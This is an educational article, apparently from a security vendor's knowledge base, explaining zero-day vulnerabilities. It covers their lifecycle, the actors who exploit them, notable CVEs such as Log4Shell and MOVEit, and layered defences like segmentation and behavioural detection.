Zero-Day Vulnerabilities
A zero-day vulnerability is a software flaw that is unknown to the vendor and has no available patch at the time it is discovered or exploited.
Continue your mission
A zero-day vulnerability is a software flaw that is unknown to the vendor and has no available patch at the time it is discovered or exploited.
# Zero-Day Vulnerabilities
A zero-day vulnerability is a software flaw that is unknown to the vendor and has no available patch at the time it is discovered or exploited. The term "zero-day" refers to the number of days the vendor has had to produce a fix: zero. The vendor learns about the vulnerability either through their own research, through responsible disclosure from a security researcher, or by discovering that it is already being exploited in the wild (a zero-day exploit).
Zero-days represent the most challenging class of vulnerability because the standard defensive playbook (identify the vulnerability, apply the patch, verify the fix) does not apply. There is no patch. The vulnerability scanner may not detect it. The signature-based detection may not recognize the exploit. The organization is exposed to a threat that its standard controls were not designed to address.
The distinction between a zero-day vulnerability and a zero-day exploit is important. A zero-day vulnerability exists in the software but may not be actively exploited. A zero-day exploit is a working attack that uses the vulnerability to compromise systems. Not every zero-day vulnerability has a corresponding zero-day exploit (some are discovered and patched before exploitation). Every zero-day exploit has a corresponding zero-day vulnerability. The risk is highest when the exploit exists and is actively used in the wild.
Google's Threat Analysis Group (TAG) and Mandiant tracked 97 zero-day vulnerabilities exploited in the wild in 2023, an increase from 62 in 2022. The trend is upward: more zero-days are being discovered and exploited each year, driven by increasing attacker investment in vulnerability research (both state-sponsored and commercial spyware vendors) and expanding attack surface (more software, more complexity, more internet-facing services).
Discovery. The vulnerability is found by a security researcher, a threat actor, or the vendor's own security team. The discoverer's decision at this point determines the vulnerability's trajectory:
Responsible disclosure: the researcher reports the vulnerability to the vendor privately, giving the vendor time to develop and release a patch before the vulnerability is publicly disclosed. CERT/CC, vendor bug bounty programs, and direct vendor contact are common responsible disclosure channels. The industry standard is 90 days from disclosure to the vendor before public release (Google Project Zero's policy).
Exploitation: the threat actor discovers the vulnerability and develops an exploit without informing the vendor. The vulnerability is exploited against targets while the vendor remains unaware. This is the zero-day exploit scenario: the vendor has zero days of awareness.
Commercial sale: the discoverer sells the vulnerability or exploit to a government agency, a commercial spyware vendor (NSO Group, Intellexa, Candiru), or an exploit broker (Zerodium, Crowdfense). The buyer uses the exploit for intelligence collection, law enforcement, or offensive operations. Commercial exploit markets create financial incentives for discovering and withholding zero-days rather than reporting them.
Exploitation window. The period between the first exploitation and the vendor's patch release. During this window, every organization running the vulnerable software is exposed. The exploitation window for zero-days exploited in the wild varies from days to months: some zero-days are discovered through their exploitation and patched within days (the vendor rushes an emergency patch). Others are exploited for months before detection (the attacker uses the exploit sparingly to avoid triggering the investigation that would lead to discovery).
Patch release. The vendor develops and releases a patch. The zero-day becomes a known vulnerability with an available fix. The exploitation window closes for organizations that apply the patch. The exploitation window remains open for organizations that do not (and many do not: patch deployment timelines of 30 to 90 days mean the vulnerability may be exploitable for months after the patch is available).
Post-patch exploitation. After the patch is released, the vulnerability details are public (or derivable through patch diffing: comparing the patched code to the unpatched code to identify the fix and reverse-engineer the vulnerability). Attackers who did not have the zero-day exploit before the patch can now develop one. Post-patch exploitation is common: many organizations do not patch promptly, and the public disclosure of the vulnerability provides a roadmap for every attacker who was not already exploiting it.
Nation-state actors. The primary consumers of zero-day exploits. State-sponsored cyber operations (Chinese MSS, Russian GRU/SVR, North Korean Lazarus Group, Iranian APT groups) use zero-days for espionage, pre-positioning, and destructive operations. The Stuxnet operation (U.S./Israel, targeting Iran's nuclear program) used four zero-day exploits simultaneously. China's Volt Typhoon has exploited zero-days in edge network devices for critical infrastructure pre-positioning.
Commercial spyware vendors. Companies like NSO Group (Pegasus spyware), Intellexa (Predator spyware), and others develop and sell zero-day exploit chains to government customers for surveillance. Pegasus has exploited zero-click zero-days in iOS (requiring no user interaction: a specially crafted iMessage triggers the exploit and compromises the device without the user clicking anything). The commercial spyware industry is a significant zero-day consumer that drives exploit development investment.
Ransomware operators. Increasingly using zero-days for initial access. The Cl0p ransomware group exploited zero-days in MOVEit Transfer (CVE-2023-34362), GoAnywhere MFT (CVE-2023-0669), and Accellion FTA (CVE-2021-27101) for mass exploitation campaigns. Cl0p's model: discover or purchase a zero-day in a widely deployed file transfer application, exploit it at scale before the vendor can patch, exfiltrate data from thousands of victims, and extort payment.
Security researchers. Ethical researchers who discover zero-days and report them through responsible disclosure. Bug bounty programs (HackerOne, Bugcrowd, vendor-specific programs) provide financial incentives for responsible disclosure: Apple pays up to $2 million for the most critical zero-day reports. Google pays up to $250,000. The bug bounty market competes with the exploit broker market for researcher attention.
Log4Shell (CVE-2021-44228, December 2021). A critical remote code execution vulnerability in Apache Log4j, a ubiquitous Java logging library. Log4Shell was trivially exploitable (a specially crafted string in any log message triggered remote code execution) and affected hundreds of thousands of applications. Exploitation began within hours of public disclosure and continued for months as organizations struggled to identify and patch every instance of Log4j in their environments.
MOVEit Transfer (CVE-2023-34362, May 2023). A SQL injection vulnerability in Progress Software's MOVEit file transfer application. Cl0p exploited the vulnerability as a zero-day, exfiltrating data from 2,500+ organizations and affecting approximately 90 million individuals before the patch was released.
Citrix Bleed (CVE-2023-4966, October 2023). An information disclosure vulnerability in Citrix NetScaler ADC and Gateway that allowed attackers to steal session tokens and bypass authentication. LockBit ransomware operators exploited Citrix Bleed extensively against healthcare, government, and critical infrastructure targets.
Ivanti Connect Secure (CVE-2024-21887 and CVE-2023-46805, January 2024). Authentication bypass and command injection vulnerabilities in Ivanti's VPN appliance. Chinese state-sponsored actors exploited both vulnerabilities as zero-days for espionage and pre-positioning. CISA issued an emergency directive requiring federal agencies to disconnect Ivanti appliances.
Zero-days challenge the fundamental assumption of signature-based security: that threats can be identified by matching known patterns. When the vulnerability is unknown and the exploit is novel, there is no signature to match, no CVE to scan for, and no patch to deploy. Organizations that rely exclusively on signature-based detection and patch-based remediation have no defense against zero-day exploitation.
Defense against zero-days requires controls that operate independently of specific vulnerability knowledge:
Network segmentation limits the attacker's ability to move from the initially exploited system to other systems, regardless of which vulnerability was used for initial access. Behavioral analytics detects anomalous behavior (a web server spawning a command shell, an application making unexpected outbound connections) regardless of the specific exploit that caused it. Least privilege limits the damage the attacker can cause from the compromised system by restricting the system's access to only what it operationally requires. Application control prevents the execution of unauthorized code even if a vulnerability is successfully exploited. Immutable backups ensure recovery capability even if the exploit leads to ransomware deployment.
These controls do not prevent the zero-day exploitation. They limit its impact and increase the probability of detection. The goal is not to stop every zero-day (which is impossible) but to ensure that a zero-day exploitation does not lead to domain-wide compromise.
More software, more complexity, and more internet-facing services mean more zero-day vulnerabilities. Every application, every library, and every network device is a potential source of zero-days. The attack surface for zero-day discovery is proportional to the total volume of deployed software. Reducing the attack surface (removing unnecessary software, minimizing internet-facing services, consolidating technology stacks) reduces the probability of being affected by a zero-day in any specific component.
Patch management addresses known vulnerabilities. Zero-days are unknown vulnerabilities. An organization with a perfect patch management program (100% compliance, 48-hour SLA for critical patches) is still vulnerable to zero-days because no patch exists to deploy. Patch management is necessary but not sufficient. Defense-in-depth (layered controls that do not depend on knowing the specific vulnerability) is required.
Zero-day defense spans VSD (attack surface reduction) and TID (detection without signatures) in the Planetary Defense Model.
CDA's Continuous Surface Reduction (CSR) methodology reduces zero-day exposure through attack surface minimization. "Every surface you expose is a surface we eliminate." Every unnecessary internet-facing service is a potential zero-day target. Every unnecessary software component is a potential zero-day source. CSR eliminates what is not operationally necessary, reducing the probability that the organization runs the specific software that the next zero-day affects.
CDA's Predictive Defense Intelligence (PDI) methodology detects zero-day exploitation through behavioral detection rather than signature matching. "See the threat before it sees you." An exploited web server that spawns a command shell, downloads additional tools, and initiates outbound connections to an unknown external IP exhibits behavior that PDI detects regardless of which CVE was exploited. The behavior is the indicator. The specific vulnerability is forensic context discovered after containment.
Three TOP missions address zero-day defense:
CDA approaches zero-day defense with one principle: assume you are running vulnerable software (because you are). The defensive architecture must function under the assumption that an attacker has exploited a vulnerability that no one has discovered yet. Segmentation, behavioral detection, least privilege, and immutable backups provide defense under this assumption. Signature-based detection and patching do not.
Word count: 2,048
CDA Theater missions that address topics covered in this article.
Written by Evan Morgan
Found an issue? Help improve this article.